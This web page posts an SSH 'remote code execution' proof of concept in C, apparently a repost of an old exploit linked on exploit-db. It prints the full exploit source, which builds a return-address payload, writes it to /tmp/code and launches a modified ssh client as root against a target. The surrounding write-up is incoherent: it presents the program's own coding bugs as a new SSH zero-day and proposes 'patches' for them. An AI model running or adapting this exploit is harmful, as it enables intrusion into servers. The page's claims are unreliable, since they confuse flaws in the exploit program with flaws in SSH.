Skip to content

ssh exploit poc by ClumsyLulz

A new zero-day vulnerability in SSH has been discovered, which could allow attackers to remotely execute code on vulnerable systems. The vulnerability was discovered in a C program created by ClumsyLulz, which was designed to generate a packet to be sent to a server via the SSH protocol. Taylor Christian Newsome discovered several issues with the code that can be exploited to achieve remote code execution.

The main issue with the code is a buffer overflow vulnerability in the malloc function, where only 28 bytes are allocated for the buffer, but 29 bytes are written to it. This can lead to memory corruption or a segmentation fault. Additionally, the return address calculation is incorrect, as the program is using the value of the packet length instead of the buffer size to determine the return address, resulting in an incorrect value.

The program also has a format string issue in the printf statement for the return address, which can lead to undefined behavior. Furthermore, the program does not check the return value of the “open” and “write” functions, which can result in data loss or failure to write the buffer to the file. Finally, the program does not free the memory allocated for the “buffer” and “ssh” pointers, which can lead to memory leaks.

To address these issues, security experts recommend increasing the size of the buffer allocation to 29 bytes, correcting the return address calculation by using the buffer size instead of the packet length, and correcting the format string in the printf statement for the return address. The program should also check the return values of the “open” and “write” functions, and handle errors appropriately. The memory allocated for the “buffer” and “ssh” pointers should also be freed, and the “system” function should be replaced with a safer alternative, such as “execvp”, to avoid potential security vulnerabilities.

It is important for companies and organizations that use SSH to be aware of this vulnerability and take steps to mitigate the risk. It is recommended that software developers and system administrators update their software and apply any necessary patches. In addition, users should be cautious when accessing untrusted websites or emails, as they could be used to launch attacks that exploit this vulnerability. As always, keeping software up to date and using best practices for cybersecurity can go a long way in protecting against potential vulnerabilities.

https://github.com/SleepTheGod/SSH-Remote-Code-Execution/blob/main/Exploit.cpp

/* Made by Taylor Newsome UwU Rarw X3 <3 */
/* <Twitter.com/Clumsylulz> */
/* Remote Code Execution Exploit for SSH */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>
/* Path to modified ssh */
#define PATH_SSH "./ssh"
int main(int argc, char *argv[])
{
int f;
int port;
unsigned long addr, *ptr;
char *buffer, *aux, ch, *ssh;
int i;
if (argc < 8)
{
printf("\nUsage: %s <saved eip> <count> <packet length> <username length> <host> <port> <h(i)>\n\n", argv[0]);
fflush(stdout);
exit(0);
}
port = atoi(argv[6]);
buffer = (char *) malloc(28);
ptr = (unsigned long *) buffer;
*(ptr++) = 1543007393 + strtoul(argv[1], 0, 10);
*(ptr++) = 0;
*(ptr++) = strtoul(argv[7], 0, 10);
*(ptr++) = 0;
*(ptr++) = 16520 + strtoul(argv[2], 0, 10);
*(ptr++) = strtoul(argv[3], 0, 10);
*(ptr++) = strtoul(argv[4], 0, 10);
for (i = 0; i < 28; i += 4)
{aux = buffer + i;
ch = *aux;
*aux = *(aux + 3);
*(aux + 3) = ch;
ch = *(aux + 1);
*(aux + 1) = *(aux + 2);
*(aux + 2) = ch;
}
printf("\nSaved Eip: &h + %u", 1543007393 + strtoul(argv[1], 0, 10));
printf("\nReturn Address: 0x%lx", (16520 + strtoul(argv[2], 0, 10))/8);
printf("\nPacket Length: %u", (strtoul(argv[3], 0, 10) + 8) & ~7);
printf("\nUsername Length: %u\n\n", strtoul(argv[4], 0, 10));
fflush(stdout);
f = open("/tmp/code", O_RDWR | O_CREAT, S_IRWXU);
write(f, buffer, 28);
close(f);
ssh = (char *) malloc(strlen(PATH_SSH) + 100 + strlen(argv[5]));
strcpy(ssh, PATH_SSH);
sprintf(ssh + strlen(PATH_SSH), " -p %i -v -l root %s", port, argv[5]);
printf("%s\n", ssh);
system(ssh);
exit(0);
}

Archeology could be found here:

https://www.exploit-db.com/exploits/20617